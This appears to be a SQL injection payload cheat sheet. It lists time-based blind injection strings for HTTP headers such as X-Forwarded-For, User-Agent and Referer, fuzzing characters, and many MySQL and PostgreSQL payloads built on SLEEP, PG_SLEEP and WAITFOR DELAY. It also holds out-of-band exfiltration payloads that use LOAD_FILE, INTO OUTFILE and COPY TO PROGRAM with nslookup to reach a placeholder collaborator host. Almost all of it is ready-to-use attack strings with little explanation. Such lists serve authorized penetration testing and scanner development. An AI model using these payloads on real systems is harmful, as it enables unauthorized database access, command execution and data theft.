X-Forwarded-For: (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
True-Client-IP: (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
X-Client-IP: (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
X-Real-IP: (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Referer: (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

User-Agent: 'XOR(if(now()=sysdate(),sleep(15),0))OR
X-Forwarded-Server: 'XOR(if(now()=sysdate(),sleep(15),0))OR
X-Forwarded-Host: 'XOR(if(now()=sysdate(),sleep(15),0))OR
X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(15),0))OR
True-Client-IP: 'XOR(if(now()=sysdate(),sleep(15),0))OR
X-Client-IP: 'XOR(if(now()=sysdate(),sleep(15),0))OR
X-Real-IP: 'XOR(if(now()=sysdate(),sleep(15),0))OR
Referer: 'XOR(if(now()=sysdate(),sleep(15),0))OR

User-Agent: "XOR(if(now()=sysdate(),sleep(15),0))XOR"X
X-Forwarded-Server: "XOR(if(now()=sysdate(),sleep(15),0))XOR"X
X-Forwarded-Host: "XOR(if(now()=sysdate(),sleep(15),0))XOR"X
X-Forwarded-For: "XOR(if(now()=sysdate(),sleep(15),0))XOR"X
True-Client-IP: "XOR(if(now()=sysdate(),sleep(15),0))XOR"X
X-Client-IP: "XOR(if(now()=sysdate(),sleep(15),0))XOR"X
X-Real-IP: "XOR(if(now()=sysdate(),sleep(15),0))XOR"X
Referer: "XOR(if(now()=sysdate(),sleep(15),0))XOR"X

User-Agent: if(1=1,sleep(15),0)/*'XOR(if(1=1,sleep(15),0))OR'"XOR(if(1=1,sleep(15),0))OR"*/
X-Forwarded-Server: if(1=1,sleep(15),0)/*'XOR(if(1=1,sleep(15),0))OR'"XOR(if(1=1,sleep(15),0))OR"*/
X-Forwarded-Host: if(1=1,sleep(15),0)/*'XOR(if(1=1,sleep(15),0))OR'"XOR(if(1=1,sleep(15),0))OR"*/
X-Forwarded-For: if(1=1,sleep(15),0)/*'XOR(if(1=1,sleep(15),0))OR'"XOR(if(1=1,sleep(15),0))OR"*/
True-Client-IP: if(1=1,sleep(15),0)/*'XOR(if(1=1,sleep(15),0))OR'"XOR(if(1=1,sleep(15),0))OR"*/
X-Client-IP: if(1=1,sleep(15),0)/*'XOR(if(1=1,sleep(15),0))OR'"XOR(if(1=1,sleep(15),0))OR"*/
X-Real-IP: if(1=1,sleep(15),0)/*'XOR(if(1=1,sleep(15),0))OR'"XOR(if(1=1,sleep(15),0))OR"*/
Referer: if(1=1,sleep(15),0)/*'XOR(if(1=1,sleep(15),0))OR'"XOR(if(1=1,sleep(15),0))OR"*/
SQL Injection
3 - SQL Injection Fuzzing Detection

Portswigger SQLI Cheatsheet Tib3rius SQLI Cheatsheet Invicti SQLI Cheatsheet

+
%20
' FIX Syntax + Comment
\'
''
" FIX Syntax + Logic Condition + Query + Comment
\"
""
`
\`
`` 1=1 -- comment
)
') 1=2 #comment
\')
'') 1=5 /*comment*/
;
';
")
\")
"))
";
`) + SLEEP(10)
\`)
``)
OR+ PG_SLEEP(10)
`; AND+ RANDOMBLOB(1000000000/2)
'))
\'))
XOR() WAITFOR DELAY '0:0:10'
'')) ||
'); DBMS_PIPE.RECEIVE_MESSAGE('RANDSTR',10)
"))
\"))
""))
");
`)) SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual
\`))
``)) IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'
`); SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END
')))
\')))
SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a')
'')))
'));
")))
\")))
"")))
AND SLEEP(10)=0
")); AND 'RANDSTR'||PG_SLEEP(10)='RANDSTR'
`))) AND 1337=(CASE WHEN (1=1) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1337 END)

\`))) AND 1337=(CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('RANDSTR',10) ELSE 1337 END)
``))) AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
`));
SQL Injection
4 - TIME-Based AND DNS Exfiltration SQL Injection Payloads

PostgreSQL MySQL

+AND+SLEEP(15)+--+
;PG_SLEEP(15)+-- )+AND+SLEEP(15)+--+
))+AND+SLEEP(15)+--+
);PG_SLEEP(15)+-- )))+AND+SLEEP(15)+--+
'+AND+SLEEP(15)+--+
));PG_SLEEP(15)+-- ')+AND+SLEEP(15)+--+
'))+AND+SLEEP(15)+--+
)));PG_SLEEP(15)+-- ')))+AND+SLEEP(15)+--+
"+AND+SLEEP(15)+--+
';PG_SLEEP(15)+-- ")+AND+SLEEP(15)+--+
"))+AND+SLEEP(15)+--+
');PG_SLEEP(15)+-- ")))+AND+SLEEP(15)+--+
`+AND+SLEEP(15)+--+
'));PG_SLEEP(15)+-- `)+AND+SLEEP(15)+--+
`))+AND+SLEEP(15)+--+
')));PG_SLEEP(15)+-- `)))+AND+SLEEP(15)+--+
;SLEEP(15)+--+
";PG_SLEEP(15)+-- );SLEEP(15)+--+
));SLEEP(15)+--+
");PG_SLEEP(15)+-- )));SLEEP(15)+--+
';SLEEP(15)+--+
"));PG_SLEEP(15)+-- ');SLEEP(15)+--+
'));SLEEP(15)+--+
")));PG_SLEEP(15)+-- ')));SLEEP(15)+--+
";SLEEP(15)+--+
`;PG_SLEEP(15)+-- ");SLEEP(15)+--+
"));SLEEP(15)+--+
`);PG_SLEEP(15)+-- ")));SLEEP(15)+--+
`;SLEEP(15)+--+
`));PG_SLEEP(15)+-- `);SLEEP(15)+--+
`));SLEEP(15)+--+
`)));PG_SLEEP(15)+-- `)));SLEEP(15)+--+
+XOR(if(now()=sysdate(),sleep(15),0))+--+
;SELECT+PG_SLEEP(15)+-- )+XOR(if(now()=sysdate(),sleep(15),0))+--+
))+XOR(if(now()=sysdate(),sleep(15),0))+--+
);SELECT+PG_SLEEP(15)+-- )))+XOR(if(now()=sysdate(),sleep(15),0))+--+
'+XOR(if(now()=sysdate(),sleep(15),0))+--+
));SELECT+PG_SLEEP(15)+-- ')+XOR(if(now()=sysdate(),sleep(15),0))+--+
'))+XOR(if(now()=sysdate(),sleep(15),0))+--+
)));SELECT+PG_SLEEP(15)+-- ')))+XOR(if(now()=sysdate(),sleep(15),0))+--+
"+XOR(if(now()=sysdate(),sleep(15),0))+--+
';SELECT+PG_SLEEP(15)+-- ")+XOR(if(now()=sysdate(),sleep(15),0))+--+
"))+XOR(if(now()=sysdate(),sleep(15),0))+--+
');SELECT+PG_SLEEP(15)+-- ")))+XOR(if(now()=sysdate(),sleep(15),0))+--+
`+XOR(if(now()=sysdate(),sleep(15),0))+--+
'));SELECT+PG_SLEEP(15)+-- `)+XOR(if(now()=sysdate(),sleep(15),0))+--+
`))+XOR(if(now()=sysdate(),sleep(15),0))+--+
')));SELECT+PG_SLEEP(15)+-- `)))+XOR(if(now()=sysdate(),sleep(15),0))+--+
;SELECT+SLEEP(15)+--+
";SELECT+PG_SLEEP(15)+-- );SELECT+SLEEP(15)+--+
));SELECT+SLEEP(15)+--+
");SELECT+PG_SLEEP(15)+-- )));SELECT+SLEEP(15)+--+
';SELECT+SLEEP(15)+--+
"));SELECT+PG_SLEEP(15)+-- ');SELECT+SLEEP(15)+--+
'));SELECT+SLEEP(15)+--+
")));SELECT+PG_SLEEP(15)+-- ')));SELECT+SLEEP(15)+--+
";SELECT+SLEEP(15)+--+
`;SELECT+PG_SLEEP(15)+-- ");SELECT+SLEEP(15)+--+
"));SELECT+SLEEP(15)+--+
`);SELECT+PG_SLEEP(15)+-- ")));SELECT+SLEEP(15)+--+
`;SELECT+SLEEP(15)+--+
`));SELECT+PG_SLEEP(15)+-- `);SELECT+SLEEP(15)+--+
`));SELECT+SLEEP(15)+--+
`)));SELECT+PG_SLEEP(15)+-- `)));SELECT+SLEEP(15)+--+
+UNION+SELECT+SLEEP(15)+--+
+UNION+SELECT+PG_SLEEP(15)+-- )+UNION+SELECT+SLEEP(15)+--+
))+UNION+SELECT+SLEEP(15)+--+
)+UNION+SELECT+PG_SLEEP(15)+-- )))+UNION+SELECT+SLEEP(15)+--+
'+UNION+SELECT+SLEEP(15)+--+
))+UNION+SELECT+PG_SLEEP(15)+-- ')+UNION+SELECT+SLEEP(15)+--+
'))+UNION+SELECT+SLEEP(15)+--+
)))+UNION+SELECT+PG_SLEEP(15)+-- ')))+UNION+SELECT+SLEEP(15)+--+
"+UNION+SELECT+SLEEP(15)+--+
'+UNION+SELECT+PG_SLEEP(15)+-- ")+UNION+SELECT+SLEEP(15)+--+
"))+UNION+SELECT+SLEEP(15)+--+
')+UNION+SELECT+PG_SLEEP(15)+-- ")))+UNION+SELECT+SLEEP(15)+--+
`+UNION+SELECT+SLEEP(15)+--+
'))+UNION+SELECT+PG_SLEEP(15)+-- `)+UNION+SELECT+SLEEP(15)+--+
`))+UNION+SELECT+SLEEP(15)+--+
')))+UNION+SELECT+PG_SLEEP(15)+-- `)))+UNION+SELECT+SLEEP(15)+--+
;SELECT+IF((1=1),SLEEP(15),1337)+--+
"+UNION+SELECT+PG_SLEEP(15)+-- );SELECT+IF((1=1),SLEEP(15),1337)+--+
));SELECT+IF((1=1),SLEEP(15),1337)+--+
")+UNION+SELECT+PG_SLEEP(15)+-- )));SELECT+IF((1=1),SLEEP(15),1337)+--+
';SELECT+IF((1=1),SLEEP(15),1337)+--+
"))+UNION+SELECT+PG_SLEEP(15)+-- ');SELECT+IF((1=1),SLEEP(15),1337)+--+
'));SELECT+IF((1=1),SLEEP(15),1337)+--+
")))+UNION+SELECT+PG_SLEEP(15)+-- ')));SELECT+IF((1=1),SLEEP(15),1337)+--+
";SELECT+IF((1=1),SLEEP(15),1337)+--+
`+UNION+SELECT+PG_SLEEP(15)+-- ");SELECT+IF((1=1),SLEEP(15),1337)+--+
"));SELECT+IF((1=1),SLEEP(15),1337)+--+
`)+UNION+SELECT+PG_SLEEP(15)+-- ")));SELECT+IF((1=1),SLEEP(15),1337)+--+
`;SELECT+IF((1=1),SLEEP(15),1337)+--+
`))+UNION+SELECT+PG_SLEEP(15)+-- `);SELECT+IF((1=1),SLEEP(15),1337)+--+
`));SELECT+IF((1=1),SLEEP(15),1337)+--+
`)))+UNION+SELECT+PG_SLEEP(15)+-- `)));SELECT+IF((1=1),SLEEP(15),1337)+--+
+UNION+SELECT+IF((1=1),SLEEP(15),1337)+--+
;(SELECT+1+FROM+PG_SLEEP(15))+-- )+UNION+SELECT+IF((1=1),SLEEP(15),1337)+--+
))+UNION+SELECT+IF((1=1),SLEEP(15),1337)+--+
);(SELECT+1+FROM+PG_SLEEP(15))+-- )))+UNION+SELECT+IF((1=1),SLEEP(15),1337)+--+
'+UNION+SELECT+IF((1=1),SLEEP(15),1337)+--+
));(SELECT+1+FROM+PG_SLEEP(15))+-- ')+UNION+SELECT+IF((1=1),SLEEP(15),1337)+--+
'))+UNION+SELECT+IF((1=1),SLEEP(15),1337)+--+
)));(SELECT+1+FROM+PG_SLEEP(15))+-- ')))+UNION+SELECT+IF((1=1),SLEEP(15),1337)+--+
"+UNION+SELECT+IF((1=1),SLEEP(15),1337)+--+
';(SELECT+1+FROM+PG_SLEEP(15))+-- ")+UNION+SELECT+IF((1=1),SLEEP(15),1337)+--+
"))+UNION+SELECT+IF((1=1),SLEEP(15),1337)+--+
');(SELECT+1+FROM+PG_SLEEP(15))+-- ")))+UNION+SELECT+IF((1=1),SLEEP(15),1337)+--+
`+UNION+SELECT+IF((1=1),SLEEP(15),1337)+--+
'));(SELECT+1+FROM+PG_SLEEP(15))+-- `)+UNION+SELECT+IF((1=1),SLEEP(15),1337)+--+
`))+UNION+SELECT+IF((1=1),SLEEP(15),1337)+--+
')));(SELECT+1+FROM+PG_SLEEP(15))+-- `)))+UNION+SELECT+IF((1=1),SLEEP(15),1337)+--+
+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
";(SELECT+1+FROM+PG_SLEEP(15))+-- )+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
))+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
");(SELECT+1+FROM+PG_SLEEP(15))+-- )))+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
'+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
"));(SELECT+1+FROM+PG_SLEEP(15))+-- ')+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
'))+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
")));(SELECT+1+FROM+PG_SLEEP(15))+-- ')))+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
"+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
`;(SELECT+1+FROM+PG_SLEEP(15))+-- ")+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
"))+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
`);(SELECT+1+FROM+PG_SLEEP(15))+-- ")))+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
`+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
`));(SELECT+1+FROM+PG_SLEEP(15))+-- `)+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
`))+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
`)));(SELECT+1+FROM+PG_SLEEP(15))+-- `)))+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
+AND+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
+AND+123=(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- )+AND+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
))+AND+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
)+AND+123=(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- )))+AND+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
'+AND+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
))+AND+123=(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ')+AND+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
'))+AND+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
)))+AND+123=(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ')))+AND+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
"+AND+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
'+AND+123=(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ")+AND+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
"))+AND+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
')+AND+123=(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ")))+AND+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
`+AND+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
'))+AND+123=(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- `)+AND+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
`))+AND+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
')))+AND+123=(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- `)))+AND+(SELECT+1+FROM+(SELECT(SLEEP(15)))x)+--+
+UNION+SELECT+1+FROM+(SELECT(SLEEP(15)))+--+
"+AND+123=(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- )+UNION+SELECT+1+FROM+(SELECT(SLEEP(15)))+--+
))+UNION+SELECT+1+FROM+(SELECT(SLEEP(15)))+--+
")+AND+123=(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- )))+UNION+SELECT+1+FROM+(SELECT(SLEEP(15)))+--+
'+UNION+SELECT+1+FROM+(SELECT(SLEEP(15)))+--+
"))+AND+123=(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ')+UNION+SELECT+1+FROM+(SELECT(SLEEP(15)))+--+
'))+UNION+SELECT+1+FROM+(SELECT(SLEEP(15)))+--+
")))+AND+123=(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ')))+UNION+SELECT+1+FROM+(SELECT(SLEEP(15)))+--+
"+UNION+SELECT+1+FROM+(SELECT(SLEEP(15)))+--+
`+AND+123=(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ")+UNION+SELECT+1+FROM+(SELECT(SLEEP(15)))+--+
"))+UNION+SELECT+1+FROM+(SELECT(SLEEP(15)))+--+
`)+AND+123=(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ")))+UNION+SELECT+1+FROM+(SELECT(SLEEP(15)))+--+
`+UNION+SELECT+1+FROM+(SELECT(SLEEP(15)))+--+
`))+AND+123=(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- `)+UNION+SELECT+1+FROM+(SELECT(SLEEP(15)))+--+
`))+UNION+SELECT+1+FROM+(SELECT(SLEEP(15)))+--+
`)))+AND+123=(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- `)))+UNION+SELECT+1+FROM+(SELECT(SLEEP(15)))+--+
;SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- );SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
));SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
)+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- )));SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
';SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
))+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ');SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
'));SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
)))+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ')));SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
";SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
'+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ");SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
"));SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
')+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ")));SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
`;SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
'))+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- `);SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
`));SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
')))+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- `)));SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
+UNION+SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
"+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- )+UNION+SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
))+UNION+SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
")+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- )))+UNION+SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
'+UNION+SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
"))+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ')+UNION+SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
'))+UNION+SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
")))+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ')))+UNION+SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
"+UNION+SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
`+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ")+UNION+SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
"))+UNION+SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
`)+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ")))+UNION+SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
`+UNION+SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
`))+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- `)+UNION+SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
`))+UNION+SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
`)))+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- `)))+UNION+SELECT+LOAD_FILE('\\BURPCOLLABORATOR\x')+--+
+AND+(SELECT+LOAD_FILE('\\\\BURPCOLLABORATOR\\x'))+--+
+UNION+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- )+AND+(SELECT+LOAD_FILE('\\\\BURPCOLLABORATOR\\x'))+--+
))+AND+(SELECT+LOAD_FILE('\\\\BURPCOLLABORATOR\\x'))+--+
)+UNION+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- )))+AND+(SELECT+LOAD_FILE('\\\\BURPCOLLABORATOR\\x'))+--+
'+AND+(SELECT+LOAD_FILE('\\\\BURPCOLLABORATOR\\x'))+--+
))+UNION+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ')+AND+(SELECT+LOAD_FILE('\\\\BURPCOLLABORATOR\\x'))+--+
'))+(SELECT+LOAD_FILE('\\\\BURPCOLLABORATOR\\x'))+--+
)))+UNION+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ')))+(SELECT+LOAD_FILE('\\\\BURPCOLLABORATOR\\x'))+--+
"+AND+(SELECT+LOAD_FILE('\\\\BURPCOLLABORATOR\\x'))+--+
'+UNION+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ")+AND+(SELECT+LOAD_FILE('\\\\BURPCOLLABORATOR\\x'))+--+
"))+AND+(SELECT+LOAD_FILE('\\\\BURPCOLLABORATOR\\x'))+--+
')+UNION+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ")))+AND+(SELECT+LOAD_FILE('\\\\BURPCOLLABORATOR\\x'))+--+
`+AND+(SELECT+LOAD_FILE('\\\\BURPCOLLABORATOR\\x'))+--+
'))+UNION+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- `)+AND+(SELECT+LOAD_FILE('\\\\BURPCOLLABORATOR\\x'))+--+
`))+AND+(SELECT+LOAD_FILE('\\\\BURPCOLLABORATOR\\x'))+--+
')))+UNION+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- `)))+AND+(SELECT+LOAD_FILE('\\\\BURPCOLLABORATOR\\x'))+--+
+AND+LOAD_FILE('\\\\BURPCOLLABORATOR\\x')+--+
"+UNION+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- )+AND+LOAD_FILE('\\\\BURPCOLLABORATOR\\x')+--+
))+AND+LOAD_FILE('\\\\BURPCOLLABORATOR\\x')+--+
")+UNION+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- )))+AND+LOAD_FILE('\\\\BURPCOLLABORATOR\\x')+--+
'+AND+LOAD_FILE('\\\\BURPCOLLABORATOR\\x')+--+
"))+UNION+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ')+AND+LOAD_FILE('\\\\BURPCOLLABORATOR\\x')+--+
'))+LOAD_FILE('\\\\BURPCOLLABORATOR\\x')+--+
")))+UNION+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ')))+LOAD_FILE('\\\\BURPCOLLABORATOR\\x')+--+
"+AND+LOAD_FILE('\\\\BURPCOLLABORATOR\\x')+--+
`+UNION+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ")+AND+LOAD_FILE('\\\\BURPCOLLABORATOR\\x')+--+
"))+AND+LOAD_FILE('\\\\BURPCOLLABORATOR\\x')+--+
`)+UNION+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- ")))+AND+LOAD_FILE('\\\\BURPCOLLABORATOR\\x')+--+
`+AND+LOAD_FILE('\\\\BURPCOLLABORATOR\\x')+--+
`))+UNION+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- `)+AND+LOAD_FILE('\\\\BURPCOLLABORATOR\\x')+--+
`))+AND+LOAD_FILE('\\\\BURPCOLLABORATOR\\x')+--+
`)))+UNION+SELECT+(CASE+WHEN+(1=1)+THEN+(SELECT+123+FROM+PG_SLEEP(15))+ELSE+1337+END)+-- `)))+AND+LOAD_FILE('\\\\BURPCOLLABORATOR\\x')+--+
;SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
;COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR'+-- );SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
));SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
);COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR'+-- )));SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
';SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
));COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR'+-- ');SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
'));SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
)));COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR'+-- ')));SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
";SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
';COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR'+-- ");SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
"));SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
');COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR'+-- ")));SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
`;SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
'));COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR'+-- `);SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
